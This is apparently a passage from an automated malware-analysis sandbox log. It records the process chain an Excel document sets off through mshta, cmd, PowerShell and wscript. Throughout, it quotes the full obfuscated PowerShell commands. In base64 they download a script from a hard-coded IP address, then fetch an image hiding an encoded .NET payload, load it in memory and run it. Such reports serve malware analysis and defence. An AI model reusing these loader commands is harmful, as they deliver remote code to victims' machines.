ICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES476D.tmp" "c:\Users\user\AppData\Local\Temp\izhw321o\CSCDC8260CFBF8C4877B302B76AFCC254F.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA5F0.tmp" "c:\Users\user\AppData\Local\Temp\24vqjdjh\CSCC170874EB5994B058785371DF20B8BA.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" Jump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES476D.tmp" "c:\Users\user\AppData\Local\Temp\izhw321o\CSCDC8260CFBF8C4877B302B76AFCC254F.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3J